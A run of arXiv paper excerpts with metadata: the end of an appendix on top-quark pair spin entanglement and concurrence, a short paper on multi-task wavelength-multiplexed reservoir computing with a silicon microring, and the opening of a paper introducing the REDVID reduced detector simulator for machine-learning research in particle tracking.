\begin{table} \begin{tabular}{|c|c|c|c|c|} \hline & Theory & Parton-level & Unfolded & Parametric Fitted \\ \hline \(\kappa_{\text{opt}}\) & \(0.638\) & \(0.640\pm 0.004\) & \(0.654\pm 0.037\) & \(0.642\pm 0.030\) \\ \hline \end{tabular} \end{table} Table 10: Calculated values of the optimal hadronic spin analyzing power in top decays at theory-level, at parton-level, after unfolding, and after parametric fitting. The uncertainties are from Monte Carlo statistics. Figure 13: Differential decay width of the top quark at parton-level (red), uncorrected detector-level (orange), and after unfolding (blue markers). #### Quantum States To find the total spin density matrix for the \(t\bar{t}\) system produced in a collider, we perform the sum over the phase space \(\Pi\) \[\rho_{\rm spin}(\Pi)=\sum_{\vec{k},\vec{v}\in\Pi}\rho_{\rm spin}(\vec{k},\vec{v} )=\sum_{\alpha,\beta}\Big{(}\sum_{\vec{k},\vec{v}\in\Pi}\rho(\vec{k},\vec{v})_{ \alpha,\beta}\Big{)}\left|\alpha\right\rangle\left\langle\beta\right|\,, \tag{114}\] where each matrix element must be evaluated in the same fixed frame. The \(\rho_{\rm spin}(\Pi)\) obtained in this way is a "physical" state, in the sense that if we measure the spin observable \(\mathcal{O}\), then its expectation value is simply given by \(\left\langle\mathcal{O}\right\rangle=\mathrm{tr}(\mathcal{O}\rho_{\rm spin}(\Pi))\). We would also call this a genuine quantum state. Quantum states, however, can exhibit cancellations in the entanglement of the total spin density matrix, despite entanglement among individual spin density matrices. This cancellation occurs due to the summation over the azimuthal angle of the production plane. For example, consider the case where \(\vec{v}=0\) and each \(t\bar{t}\) pair is produced with an angle \(\theta\) in the \(y-z\) plane with a spin correlation matrix of \(C_{11}\approx-C_{22}\approx C_{33}\approx 1\) (all other entries are \(0\)). The concurrence would be \(\mathcal{C}\approx 1\) corresponding to maximal entanglement. By rotational symmetry around the \(z\)-axis, each \(t\bar{t}\) pair with the same polar angle \(\theta\), but different azimuthal angle \(\phi\) is also maximally entangled. The spin correlation matrix is \[C=\begin{pmatrix}\cos^{2}\!\phi\,C_{11}+\sin^{2}\!\phi\,C_{22}&(C_{11}-C_{22}) \cos\phi\sin\phi&0\\ (C_{11}-C_{22})\cos\phi\sin\phi&\sin^{2}\!\phi\,C_{11}+\cos^{2}\!\phi\,C_{22} &0\\ 0&0&C_{33}\end{pmatrix}. \tag{115}\] Just as with the total spin density matrix, the total spin correlation matrix \(C\) is given by the sum of \(C\) in Eq. (115) over \(\phi\). After the summation the diagonal elements become: \((C_{11}+C_{22})/2\approx 0\), \((C_{11}+C_{22})/2\approx 0\), and \(C_{33}\approx 1\) leading to a concurrence \(\mathcal{C}\approx 0\). In this example, the sum of maximally entangled states became non-entangled, which is the case for the \(t\bar{t}\) system with high \(p_{T}\) at the LHC. This is why in the boosted region there is no significant entanglement in the fixed beam basis. The helicity basis, on the other hand, does exhibit large entanglement because it does not correspond to a quantum state. #### The Average of Concurrence Instead of computing the concurrence of a quantum state \(\rho_{\rm spin}(\Pi)\), we can use other quantities that will not exhibit the same cancellations, and consequently will enhance the experimental detection. 
This can be accomplished by computing the average of the concurrence \(\overline{\mathcal{C}}\) over states with different \(\vec{k}\) and evaluated in the center-of-mass frame where \(\vec{v}=0\): \[\overline{\mathcal{C}}=\sum_{\vec{k},\vec{v}}\mathcal{C}(\rho_{\rm spin}(\vec{ k},0)). \tag{116}\] This should be contrasted with the concurrence of the quantum state \(\mathcal{C}(\sum_{\vec{k},\vec{v}}\rho_{\rm spin}(\vec{k},\vec{v}))\). Since the concurrence is invariant under rotations, we can evaluate each term \(\mathcal{C}(\rho_{\rm spin}(\vec{k},0))\) in the helicity basis. Using the results from Eq. (3.16a) we find \[\mathcal{C}(\rho_{\rm spin}(\vec{k},0))=(1/2)\max(-C_{nn}(\vec{k})+|C_{kk}(\vec{ k})+C_{rr}(\vec{k})|-1,0)\] which leads to \[\overline{\mathcal{C}} =\sum_{\vec{k},\vec{v}\in\Pi}\frac{1}{2}{\rm max}\big{(}-C_{nn}( \vec{k})+|C_{kk}(\vec{k})+C_{rr}(\vec{k})|-1,0\big{)},\] (D.5) \[\geq\frac{1}{2}{\rm max}\Bigg{(}-\sum_{\vec{k},\vec{v}\in\Pi}C_{nn }(\vec{k})+\bigg{|}\sum_{\vec{k},\vec{v}\in\Pi}(C_{kk}(\vec{k})+C_{rr}(\vec{k} ))\bigg{|}-1,0\Bigg{)},\] (D.6) \[=\mathcal{C}(\overline{\rho}_{\rm spin}(\Pi)).\] (D.7) Going from Eq. (D.6) to Eq. (D.7) requires \(\sum_{\vec{k},\vec{v}}C_{nn}<0\) and that \(\sum_{\vec{k},\vec{v}}C_{rk}=\sum_{\vec{k},\vec{v}}C_{kr}\) are the only two non-vanishing off-diagonal entries of \(\sum_{\vec{k},\vec{v}}C_{ij}\). These conditions are true for both near threshold and in the boosted region. #### Fictitious States In Eq. (D.7) we define the density matrix of a "fictitious state" \(\overline{\rho}_{\rm spin}(\Pi)\) \[(\overline{\rho}_{\rm spin}(\Pi))_{\alpha,\beta}=\sum_{\vec{k},\vec{v}\in\Pi} \rho(\vec{k},0)_{\alpha(\vec{k}),\beta(\vec{k})},\] (D.8) where \(\alpha\) and \(\beta\) denote the axes along which we measure the spin. Each term in the summation should be evaluated in its own center-of-mass frame. In the helicity basis, these axes depend on \(\vec{k}\) which is why they are written as \(\alpha(\vec{k})\) and \(\beta(\vec{k})\) on the right-hand side. On the other hand, a quantum state is given by \((\rho_{\rm spin}(\Pi))_{\alpha,\beta}=\sum_{\vec{k},\vec{v}}\rho(\vec{k}, \vec{v})_{\alpha,\beta}\) (see Eq. (D.2)), where each term in the sum has a certain center-of-mass velocity and the spin is measured along the same axes. There is not an obvious physical interpretation for the fictitious state in Eq. (D.8), however, by Eqs. (D.5 - D.7) the average concurrence \(\overline{\mathcal{C}}\) is greater than or equal to the concurrence of the fictitious state. Therefore, \[\mathcal{C}(\overline{\rho}_{\rm spin}(\Pi))>0\qquad\quad\Rightarrow\qquad \quad\overline{\mathcal{C}}>0.\] (D.9) This means that when the concurrence of the fictitious state is positive, there exists a sub-state that is entangled. The same argument can be applied to CHSH violation. In the main text, concurrence and CHSH violation are measured using fictitious states. The derivation here justifies their validity in searches for entanglement and Bell inequality violation. ## Appendix E Charm Tagging An alternative to using the optimal hadronic direction is to only consider events with charm quarks. In this case, the down-type quark (the strange quark) can be identified as the jet that is not charm-tagged. Let the charm-tagging efficiency be \(\epsilon_{c}\). Adapting Eq. 
(4.4) we have \[\frac{\text{significance }(t\bar{t}\to\ell s)}{\text{significance }(t\bar{t}\to\ell\ell)}=\frac{\kappa_{s}\kappa_{\ell}}{\kappa_{\ell} \kappa_{\ell}}\sqrt{\frac{\epsilon_{c}\text{BR}(t\bar{t}\to s\ell)}{\text{BR}( t\bar{t}\to\ell\ell)}}=1.78\sqrt{\epsilon_{c}}. \tag{112}\] In order for the subset of charm-tagged semi-leptonic events to be more sensitive than all semi-leptonic events, it is necessary that \(1.78\sqrt{\epsilon_{c}}>1.60\) or \(\epsilon_{c}>0.95\). In several analyses, the operating point used for charm-tagging has an efficiency of \(30-40\%\) with a light-quark jet mistag rate of about \(5\%\)[76, 77]. Instead of only using charm-tagged events, it may be beneficial to combine two signal regions. The first signal region would consist of charm-tagged events and would use the strange-inferred jet, while the second signal region would consist of the rest of the semi-leptonic events and would use the optimal hadronic direction.
2310.16588
Multi-Task Wavelength-Multiplexed Reservoir Computing Using a Silicon Microring Resonator
Among the promising advantages of photonic computing over conventional computing architectures is the potential to increase computing efficiency through massive parallelism by using the many degrees of freedom provided by photonics. Here, we numerically demonstrate the simultaneous use of time and frequency (equivalently wavelength) multiplexing to solve three independent tasks at the same time on the same photonic circuit. In particular, we consider a microring-based time-delay reservoir computing (TDRC) scheme that simultaneously solves three tasks: Time-series prediction, classification, and wireless channel equalization. The scheme relies on time-division multiplexing to avoid the necessity of multiple physical nonlinear nodes, while the tasks are parallelized using wavelength division multiplexing (WDM). The input data modulated on each optical channel is mapped to a higher dimensional space by the nonlinear dynamics of the silicon microring cavity. The carrier wavelength and input power assigned to each optical channel have a high influence on the performance of its respective task. When all tasks operate under the same wavelength/power conditions, our results show that the computing nature of each task is the deciding factor of the level of performance achievable. However, it is possible to achieve good performance for all tasks simultaneously by optimizing the parameters of each optical channel. The variety of applications covered by the tasks shows the versatility of the proposed photonic TDRC scheme. Overall, this work provides insight into the potential of WDM-based schemes for improving the computing capabilities of reservoir computing schemes.
Bernard J. Giron Castro, Christophe Peucheret, Darko Zibar, Francesco Da Ros
2023-10-25T12:24:56Z
http://arxiv.org/abs/2310.16588v2
# Multi-parallel-task Time-delay Reservoir Computing combining a Silicon Microring with WDM

###### Abstract

We numerically demonstrate a microring-based time-delay reservoir computing scheme that simultaneously solves three tasks involving time-series prediction, classification, and wireless channel equalization. Each task performed on a wavelength-multiplexed channel achieves state-of-the-art performance with optimized power and frequency detuning. (c) 2023 The Author(s)

## 1 Introduction

The growth of computationally demanding applications is pushing the design of novel hardware accelerators with higher power efficiency and a boost in computing power [1]. Photonic computing has emerged as a promising alternative for delivering the required computational power in the upcoming years. Well-developed technologies from optical communications, such as wavelength division multiplexing (WDM), have proven to be feasible for photonic parallel computing, as multiple computing tasks can be simultaneously addressed on different optical channels [2]. Within machine learning schemes and, more specifically, recurrent neural networks, we focus our attention on reservoir computing (RC), which is characterized by the ability to buffer past inputs and provide complex nonlinear dynamics. Furthermore, it only requires a simple linear (ridge) regression training of its output layer. RC schemes have demonstrated good performance in speech recognition and time-series prediction applications [2]. Time-delay RC (TDRC) schemes have the further advantage of minimizing the number of required physical nonlinear nodes by multiplexing virtual nodes in time. In TDRC, the response of each node is processed, one at a time, in a single physical nonlinear node. In [2] the nonlinear node is realized using Mach-Zehnder modulators, and more recently with microring resonators (MRRs) [3, 4]. In the latter case, the required nonlinear behaviour is provided by the silicon MRR through the free-carrier dispersion (FCD) and thermo-optic (TO) nonlinear effects, which emerge from two-photon absorption (TPA). In [3, 4], only one optical carrier with a wavelength close to that of a resonance of the MRR cavity was used, allowing the RC to process and solve a single task. In this work, we triple the computing capacity of MRR-based TDRC schemes by using three of the resonances of a single add-drop MRR to process three optical carriers in parallel, each detuned from its corresponding resonance. Therefore, a different task is solved per optical carrier. The three tasks cover a diversity of TDRC applications and are solved simultaneously with good performance in terms of their respective metrics. This offers a higher computing potential than other TDRC schemes that solve just a single task at a time.

## 2 RC setup, methodology of the simulations and benchmarks.

The proposed TDRC scheme is shown in Fig. 1. The three conventional TDRC benchmarking tasks solved simultaneously follow the details of [5] for the definitions of the input signals and the masking procedures. A 1-GBd input symbol sequence is used per task. The first task is a time-series prediction (NARMA-10) task, evaluated in terms of the normalized mean square error (NMSE) on the testing set. The second is a signal classification (SC) task, in which we determine the accuracy of the RC at distinguishing between sine and rectangular signals, computed as the number of correct predictions divided by the total number of predictions.
The third task is the equalization of a signal propagated through a wireless channel affected by noise and nonlinear distortion, in which the RC aims to reconstruct the original signal. For this task, we calculate the symbol error ratio (SER) of the testing set at a signal-to-noise ratio (SNR) of 32 dB. The input sequence \(u_{i}(n)\) of each task \(i\) is multiplied by its respective masking signal \(m_{i}(n)\) for \(N=50\) virtual nodes, and an optimized task-independent bias \(\beta\) is added to their product, as done in [3]. Each of the resulting signals modulates the intensity of its respective optical carrier before being wavelength-multiplexed and injected into the MRR.

## 3 Adapted physical model for FCD and TO nonlinearities with multiple optical carriers

A temporal coupled-mode theory (TCMT) approach is extended to model an add-drop MRR with multiple input WDM signals in its cavity [3, 6, 7]. We account for the modal energy of the \(i\)th modulated carrier per RC task, \(a_{i}(t)\), with a frequency \(\omega_{i}\) close to its assigned resonance frequency \(\omega_{r_{i}}\). The model includes individual contributions of each optical carrier to the total rate of change of the mode-averaged temperature with respect to the environment (\(\Delta T\)) and the excess free-carrier density generated via TPA (\(\Delta N\)). The model is defined for \(M\) optical carriers as:

\[\frac{\mathrm{d}a_{i}(t)}{\mathrm{d}t}=\big[j\delta_{i}(t)-\gamma_{\mathrm{tot}_{i}}(t)\big]a_{i}(t)+i\sqrt{\frac{2}{\tau_{c}}}\Big(E_{\mathrm{in}_{i}}(t)+E_{\mathrm{add}_{i}}(t)\Big)\,e^{j\omega_{i}t}, \tag{1}\]

\[\frac{\mathrm{d}\Delta T(t)}{\mathrm{d}t}=-\frac{\Delta T(t)}{\tau_{th}}+\frac{2\Gamma_{\mathrm{th}}}{mc_{\mathrm{p}}}\bigg[\sum_{i=1}^{M}|a_{i}(t)|^{2}P_{\mathrm{abs}_{i}}(t)\bigg], \tag{2}\]

\[\frac{\mathrm{d}\Delta N(t)}{\mathrm{d}t}=-\frac{\Delta N(t)}{\tau_{\mathrm{FC}}}+\sum_{i=1}^{M}\frac{\Gamma_{\mathrm{FCA}}c^{2}\beta_{\mathrm{TPA}}}{2\hbar\omega_{i}V_{\mathrm{FCA}}^{2}n_{\mathrm{Si}}^{3}}\,|a_{i}(t)|^{4}, \tag{3}\]

where \(\delta_{i}(t)\) is the total angular frequency detuning per carrier, including the carrier-resonance (\(\omega_{i}-\omega_{r_{i}}\)) detuning as well as the TO- and FCD-induced detuning, as in Eq. (4). \(\gamma_{\mathrm{tot}_{i}}(t)\) and \(P_{\mathrm{abs}_{i}}(t)\) denote the total losses and power absorbed in the cavity and are expressed in Eqs. (5) and (6), respectively. \(\gamma_{\mathrm{TPA/FCA}}\) are the losses due to TPA and FCA, respectively. The fields at the input and add ports are expressed by \(E_{\mathrm{in}_{i}}(t)\) and \(E_{\mathrm{add}_{i}}(t)\) for \(\omega_{i}\). \(\tau_{\mathrm{FC}}\) is the lifetime of the free carriers, \(\tau_{th}\) is the heat diffusion time constant, and \(m\) is the mass of the MRR. \(\Gamma_{\mathrm{FCA/th}}\) refer to the FCA and thermal confinement factors. \(n_{\mathrm{Si}}\), \(\beta_{\mathrm{TPA}}\) and \(c_{\mathrm{p}}\) are silicon's refractive index, TPA coefficient, and specific heat, respectively. \(V_{\mathrm{FCA/TPA}}\) are the FCA and TPA effective volumes. \(\sigma_{\mathrm{FCA}}\) is the total FCA cross-section. In Eqs. (4)-(6), \(\mathrm{d}n/\mathrm{d}N\) and \(\mathrm{d}n/\mathrm{d}T\) are the silicon FCD and TO coefficients, respectively. \(\alpha\) is the waveguide attenuation and \(\tau_{c}\) is the energy decay rate due to the coupling between the MRR and the bus waveguides. The values of the silicon constants, \(\Gamma_{\mathrm{FCA/th}}\) and \(V_{\mathrm{FCA/TPA}}\) are taken from [3].
The rest of the parameter values are listed in Fig. 1.

\[\delta_{i}(t)=\omega_{i}-\omega_{r_{i}}-\frac{\omega_{r_{i}}}{n_{\mathrm{Si}}}\Bigg{(}-\frac{\mathrm{d}n_{\mathrm{Si}}}{\mathrm{d}N}\Delta N(t)-\frac{\mathrm{d}n_{\mathrm{Si}}}{\mathrm{d}T}\Delta T(t)\Bigg{)}, \tag{4}\]

\[\gamma_{\mathrm{tot}_{i}}(t)=\frac{c\alpha}{n_{\mathrm{Si}}}+\frac{2}{\tau_{c}}+\gamma_{\mathrm{TPA}_{i}}+\gamma_{\mathrm{FCA}}=\frac{c\alpha}{n_{\mathrm{Si}}}+\frac{2}{\tau_{c}}+\frac{\beta_{\mathrm{TPA}}c^{2}}{n_{\mathrm{Si}}^{2}V_{\mathrm{TPA}}}|a_{i}(t)|^{2}+\frac{\Gamma_{\mathrm{FCA}}\sigma_{\mathrm{FCA}}c}{2n_{\mathrm{Si}}}\cdot\Delta N(t)\;, \tag{5}\]

\[P_{\mathrm{abs}_{i}}(t)=\Bigg{(}\frac{c\alpha}{n_{\mathrm{Si}}}+\frac{\beta_{\mathrm{TPA}}c^{2}}{n_{\mathrm{Si}}^{2}V_{\mathrm{TPA}}}|a_{i}(t)|^{2}+\frac{\Gamma_{\mathrm{FCA}}\sigma_{\mathrm{FCA}}c}{2n_{\mathrm{Si}}}\cdot\Delta N(t)\Bigg{)}\,|a_{i}(t)|^{2}. \tag{6}\]

Figure 1: Proposed TDRC setup scheme. On the right side, the frequency allocation used in this work.

## 4 Results and discussion.

As in [4], Eqs. (1)-(3) are normalized and solved using a 4\({}^{\rm th}\) order Runge-Kutta solver with a 2.0 ps step. First, we perform the simulation of the system by considering a range of \(-\)20 to \(+\)25 dBm of total average input power, which is split equally between the three optical carriers (\(\bar{P}_{0}=\bar{P}_{1}=\bar{P}_{2}\)). For this simulation we also consider an equal carrier-resonance detuning (\(\Delta\omega_{0}=\Delta\omega_{1}=\Delta\omega_{2}\)) spanning the \(\pm\)100 GHz range. The results for each task are shown in Fig. 2 as a function of \(\bar{P}_{\rm i}\) and \(\Delta\omega_{i}/2\pi\), where a red circle indicates their best observed performance. Minimum and maximum values per task metric are also displayed as the extreme values of the colorbar legends. We observe that the time-series (NARMA-10) prediction (Fig. 2a) and classification (Fig. 2b) tasks share a common area of good performance (low prediction error or high accuracy) which extends over a similar parameter space (\(\bar{P}_{\rm i}\), \(\Delta\omega_{i}\)). In the case of the wireless channel equalization task (Fig. 2c), the parameter space of the lowest SER is located at higher levels of \(\bar{P}_{\rm i}\) than for the NARMA-10 or SC tasks and is limited to a smaller input power range. In fact, the parameter space in which the NARMA-10 and SC tasks achieve their best performance overlaps the one in which the channel equalization task presents high SER. This highlights the different nature of the computing requirements of each task, in terms of memory and nonlinearity, in this setup. However, this also implies that under the previous simulation conditions we cannot expect optimum performance simultaneously for the three tasks. Nevertheless, without targeting a complex full 6-D optimization, we can still exploit the results of Fig. 2 as a basis to test that the three tasks can be simultaneously solved with good performance. Therefore we simulate the system with the carrier power and \(\Delta\omega_{i}\) values corresponding to the best observed performance for each task: [\(\bar{P}_{0}=0\) dBm, \(\bar{P}_{1}=-10.0\) dBm, \(\bar{P}_{2}=15.0\) dBm], and \(\Delta\omega_{i}\): [\(\Delta\omega_{0}/2\pi=-60\) GHz, \(\Delta\omega_{1}/2\pi=-45\) GHz, \(\Delta\omega_{2}/2\pi=-20\) GHz].
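For concreteness, below is a stripped-down sketch of the fixed-step RK4 integration referred to above: the state packs the three complex modal amplitudes together with \(\Delta T\) and \(\Delta N\), and the derivative keeps only the structure of Eqs. (1)-(6), with schematic dimensionless placeholder coefficients rather than the silicon parameters of [3]. In the actual TDRC simulation the drive term would follow the masked input of each carrier in time.

```python
import numpy as np

# schematic, dimensionless placeholder coefficients (not the values of Ref. [3])
M = 3                                       # number of WDM carriers / tasks
DETUNE = np.array([-0.5, 0.2, 0.8])         # static carrier-resonance detunings
GAMMA_LIN = 1.0                             # linear plus coupling losses
G_TPA = 0.05                                # two-photon absorption loss strength
G_TH, TAU_TH = 0.005, 20.0                  # thermo-optic drive and decay
G_FC, TAU_FC = 0.1, 10.0                    # free-carrier drive and decay

def derivative(state, e_in):
    """Normalized, simplified analogue of Eqs. (1)-(3)."""
    a, dT, dN = state[:M], state[M].real, state[M + 1].real
    u = np.abs(a) ** 2
    delta = DETUNE + dT - dN                   # schematic TO and FCD shifts, cf. Eq. (4)
    gamma = GAMMA_LIN + G_TPA * u + 0.5 * dN   # schematic total losses, cf. Eq. (5)
    da = (1j * delta - gamma) * a + 1j * e_in
    ddT = -dT / TAU_TH + G_TH * np.sum(gamma * u)
    ddN = -dN / TAU_FC + G_FC * np.sum(u ** 2)
    return np.concatenate([da, [ddT, ddN]])

def rk4_step(state, e_in, dt):
    k1 = derivative(state, e_in)
    k2 = derivative(state + 0.5 * dt * k1, e_in)
    k3 = derivative(state + 0.5 * dt * k2, e_in)
    k4 = derivative(state + dt * k3, e_in)
    return state + dt / 6.0 * (k1 + 2 * k2 + 2 * k3 + k4)

state = np.zeros(M + 2, dtype=complex)
drive = np.array([0.3, 0.2, 0.4])           # placeholder masked inputs per carrier
dt, steps = 0.005, 20_000
for _ in range(steps):
    state = rk4_step(state, drive, dt)
print(np.round(np.abs(state[:M]) ** 2, 4))  # cavity energies read as node responses
```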
A minimum NMSE of 0.0373 is obtained for the NARMA-10 task, which is slightly higher than in [3], where a single-carrier MRR-based TDRC with the same physical parameters was used, but still lower than in [8]. In the SC task, we obtain a maximum accuracy of 0.991, which is a very good performance for this task [5]. Finally, for the channel equalization task we find a minimum SER of \(7.0\times 10^{-4}\), which is comparable to [2, 5, 8]. Therefore, under the aforementioned conditions, each solved task suffers a slight performance penalty with respect to its best result (Fig. 2). Nonetheless, the results are still comparable to previous works [2, 3, 5, 8] while achieving parallel computing of the tasks.

## 5 Conclusion.

The potential of a WDM MRR-based TDRC scheme to solve three conventional TDRC tasks simultaneously and with good performance is numerically demonstrated. Here, we limit the analysis to three simultaneous tasks; however, a higher degree of parallelization could be possible using more MRR resonances. The results indicate the possibility of fine-tuning the power and frequency detuning of each channel, carrying a distinct task, to simultaneously achieve near-optimal performance. The performance of each task is comparable to state-of-the-art results of previous single-task TDRC implementations.

**Acknowledgment** Villum Fonden (OPTIC-AI grant n. VIL29334), Vetenskapsrådet (BRAIN, grant n. 2022-04798) and ERC-CoG FRECOM project (no. 771878).
2309.03780
Reduced Simulations for High-Energy Physics, a Middle Ground for Data-Driven Physics Research
Subatomic particle track reconstruction (tracking) is a vital task in High-Energy Physics experiments. Tracking is exceptionally computationally challenging and fielded solutions, relying on traditional algorithms, do not scale linearly. Machine Learning (ML) assisted solutions are a promising answer. We argue that a complexity-reduced problem description and the data representing it, will facilitate the solution exploration workflow. We provide the REDuced VIrtual Detector (REDVID) as a complexity-reduced detector model and particle collision event simulator combo. REDVID is intended as a simulation-in-the-loop, to both generate synthetic data efficiently and to simplify the challenge of ML model design. The fully parametric nature of our tool, with regards to system-level configuration, while in contrast to physics-accurate simulations, allows for the generation of simplified data for research and education, at different levels. Resulting from the reduced complexity, we showcase the computational efficiency of REDVID by providing the computational cost figures for a multitude of simulation benchmarks. As a simulation and a generative tool for ML-assisted solution design, REDVID is highly flexible, reusable and open-source. Reference data sets generated with REDVID are publicly available. Data generated using REDVID has enabled rapid development of multiple novel ML model designs, which is currently ongoing.
Uraz Odyurt, Stephen Nicholas Swatman, Ana-Lucia Varbanescu, Sascha Caron
2023-08-30T12:50:45Z
http://arxiv.org/abs/2309.03780v2
# Reduced Simulations for High-Energy Physics, a Middle Ground for Data-Driven Physics Research

###### Abstract.

Subatomic particle track reconstruction (tracking) is a vital task in High-Energy Physics experiments. Tracking is exceptionally computationally challenging and fielded solutions, relying on traditional algorithms, do not scale linearly. Machine Learning (ML) assisted solutions are a promising answer. We argue that a complexity-reduced problem description and the data representing it will facilitate the solution exploration workflow. We provide the REDuced VIrtual Detector (REDVID) as a complexity-reduced detector model and particle collision event simulator combo. REDVID is intended as a simulation-in-the-loop, to both generate synthetic data efficiently and to simplify the challenge of ML model design. The fully parametric nature of our tool, with regards to system-level configuration, while in contrast to physics-accurate simulations, allows for the generation of simplified data for research and education, at different levels. Resulting from the reduced complexity, we showcase the computational efficiency of REDVID by providing the computational cost figures for a multitude of simulation benchmarks. As a simulation and a generative tool for ML-assisted solution design, REDVID is highly flexible, reusable and open-source. Reference data sets generated with REDVID are publicly available.

Reduced-order modelling, Simulation, Machine learning, High-energy physics, Synthetic data
Solution design can be much faster through the informed simplification of the design-space for the ML-assisted solution. Our methodology is specifically being considered for the tracking use-case. We have designed and implemented the _REDuced Virtual Detector (REDVID)_, to both simplify the problem at hand and to act as an efficient tool for frequent simulations and synthetic data generation. While our tool is not a physics-accurate one, it does respect the high-level relations present in subatomic particle collision events and detector interactions. REDVID is fully (re)configurable, allowing definition of experiments through varying detector models, while preserving the _cascading effects_ of every change. Considering possible complexity reduction strategies, the spectrum varies from physics-accurate data manipulations, e.g., dimensionality/granularity reduction, to omitting the scenario interactions beforehand. A strategy solely based on data reduction will fail to preserve the behavioural integrity of the system, as it will fail to propagate cascading effects resulting from reductions. Even simplified examples such as the TrackML data (Beng et al., 2015) are too complex. _Contribution._ We provide REDVID, an experiment-independent, fully (re)configurable, and complexity-reduced simulation framework for HEP (Han et al., 2017). Simulations consist of complexity-reduced detector models, alongside a particle collision event simulator with reduced behavioural-space. REDVID is intended as a simulation-in-the-loop for ML model design workflows, providing: * Problem simplification, which facilitates ML solution design, as opposed to real-world use-case definitions, which are often too complex to negotiate directly. * A model generator capable of spawning detectors based on reconfigurable geometries. * Behavioural-space reductions, which directly improve event simulation and processing times. Our other contributions include: * Supporting pedagogical tasks in higher education by presenting complex interactions from HEP experiments through simplified and understandable data. * Generating and making publicly available a number of reference data sets, which are of independent interest for physicists and data scientists alike (Hernandez et al., 2017). 
This introduction is followed by Section 2, providing the background on HEP experiments and similar simulators. In Section 3, we provide the design details considered for REDVID. Notable implementation techniques are elaborated in Section 4. Data set related results are given in Section 5, followed by Sections 6 and 7, covering the relevant literature and our conclusions, respectively. ## 2. Background and Motivation We elaborate the premise of HEP experiments, as well as the role of simulation in these, to get familiar with the context of our use-case. ### HEP experiments When talking about the HEP experiments, we refer to high-energy particle collision events. Two types of collision experiments are performed at LHC, proton-proton and ion-ion collisions. Protons are extracted from hydrogen atoms, while ions are actually heavy lead ions. Beams of particles are sent down the beam pipe in opposing directions and made to collide at four specific spots. These four spots are the residing points of the four major detectors installed at LHC, namely, ALICE (Hernandez et al., 2017), CMS (Hernandez et al., 2018), LHCb (Hernandez et al., 2018) and ATLAS (Hernandez et al., 2018). Take the ATLAS detector for instance. The role played by ATLAS in the study of fundamental particles and their interactions relies on two main tasks, _tracking_ and _calorimetry_. Through tracking, i.e., particle track reconstruction, the momentum, \(p\), of a particle can be calculated, while the energy, \(E\), is calculated through calorimetry. Having the momentum and the energy for a given particle, its mass, \(m\), can be calculated, following the _energy-momentum relation_ expressed as, \[E^{2}=(mc^{2})^{2}+(pc)^{2}\,.\] In the above equation, \(c\) represents the speed of light and is a constant. The mass measurement allows the study of the properties for known particles, as well as potentially discovering new unknown ones. As such, it is fair to state that _particle track reconstruction is one of the major tasks in high-energy physics_. ### Role of simulation in HEP Simulation allows for, amongst others, the validation and training of particle track reconstruction algorithms. Two distinguished stages are considered for HEP event simulations, i.e., _physics event generation_ and _detector response simulation_(Hernandez et al., 2017). Event generation as the first stage, involves the simulation of particle collision events, encompassing the processes involved in the initial proton-proton or ion-ion interactions. Event generation is governed by intricate sets of physical rules and is performed by software packages such as Herwig (Herwig, 2010) and Pythia (Pythia, 2012), i.e., physics-accurate simulations. Detector response simulation as the second stage, integrates the movement of the particles generated by the first stage through a detector geometry, simulating the decay of unstable particles, the interactions between particles and matter, electromagnetic effects, and further physical processes such as hadronisation. Common event simulators providing such functionality include Geant4 (Geant4, 2013), FLUKA (Hernandez et al., 2017), and MCNP (Hernandez et al., 2017). In accelerator physics applications, event simulators are used to simulate the interactions between particles and sensitive surfaces in an experiment, as well as with so-called passive material, such as support beams. 
Interactions with sensitive surfaces may undergo an additional _digitisation_ step, simulating the digital signals that can be read out of the experiment. Considering the example of ATLAS, three data generating simulators can be considered, namely, Geant4, FATRAS (Hernandez et al., 2017) and ATLFAST (Perez-Hernandez et al., 2018). Following the Monte Carlo simulation approach, FATRAS has been designed to be a fast simulator. It is capable of trajectory building based on a simplified reconstruction geometry and does provide support for material effects, as well as particle decay. FATRAS also generates hit data. ATLFAST follows a different approach towards trajectory simulation and does not generate hit data, making it unsuitable for tracking studies. ATLFAST relies on hard-coded smearing functions based on statistics from full simulations. These functions are dependent on particle types, momentum ranges and vertex radii. Such details are specific to the design elements of the virtual detector geometry. A change in the design will require finding new functions. REDVID fills the gap for a reconfigurable framework that is suitable for first-phase solution exploration and design. This is due to the deliberate reduction in complexity, for both the generated data and the problem description, while keeping the high-level causal relations in place. REDVID is end-to-end parametric, i.e., all the generated data is built upon the detector geometry and randomised particle trajectories, both reconfigurable. REDVID has been developed in Python, making its integration with Python-based ML design workflows seamless. Figure 1 plots REDVID's positioning versus other well-known tools, as we consider it. ## 3. Simulation Application and Design The question here is how best one can go about designing and training a capable and rigorous ML model. The higher the complexity of a system and its associated data, the harder it is to arrive at an efficient ML model design solving the task. Generally speaking, complex tasks require larger models. Considering the upcoming High-Luminosity LHC upgrade (Beng et al., 2017), this complexity will increase even further. Addressing real-world tasks directly will require synthesising close to real-world data, which can be performed by high-accuracy simulations. High-accuracy simulations in general and physics-accurate simulations in particular are extremely expensive computational tasks. Having such tools as part of a workflow, e.g., ML model design workflows, triggering frequent executions of the simulation with altered configuration, will inevitably turn into a serious challenge. Even if there are accommodating hardware resources available, algorithmic limitations will turn these tools into workflow bottlenecks. Yet another notable drawback is the high cost of energy when running frequent computationally expensive tasks. Accordingly, it is highly beneficial, and perhaps necessary, to not only design reduced models and simulators1, but to provide parametric (re)configurability to support automated exploration. Footnote 1: A model and a simulator go hand in hand to form a simulation. However, the initial testing of new solutions (ML model designs) does not require the ground truth, which physics-accurate simulations are capable of producing. A cost-effective and reduced simulation that would preserve the behavioural relations of the complex system (proton-proton/ion-ion collision event experiments) can be integrated in ML model design workflows, as shown in Figure 2. 
Figure 1. Simulation complexity spectrum is shown from the most simplistic to the most realistic, with high complexity rates for both model and simulator. Depending on the enabled features, different simulators are capable of providing different levels of complexity, depicted as grey areas. ATLFAST is not included for lack of hit data generation. Note that this figure does not cover data reduction strategies, which is not relevant to changes in model or simulator complexity. ### Reduction approach Simulations of complex systems include virtual model(s) and mimic the behaviour of the system under scrutiny. On the one hand, the amount of detail included in the model, as a virtual representation of the complex system, will directly affect the approximation level of the simulation. On the other hand, the extent of behaviour considered by a simulator while executing the model will determine the overall achieved complexity. _Having a validly approximate representation is achieved through the reduction of the behavioural-space to a minimal subset, best encapsulating the complex system._ Both model complexity and simulator complexity can be targets of such a reduction. The first and foremost effect of an approximate simulation is better computational efficiency. Note that there can be many such approximations, depending on the intended balance between computational efficiency and behavioural approximation level. The other advantage, especially when it comes to ML model design processes, is facilitation of an effective model design by providing a middle ground that has a lower complexity and can be used for better understanding of the challenge and testing 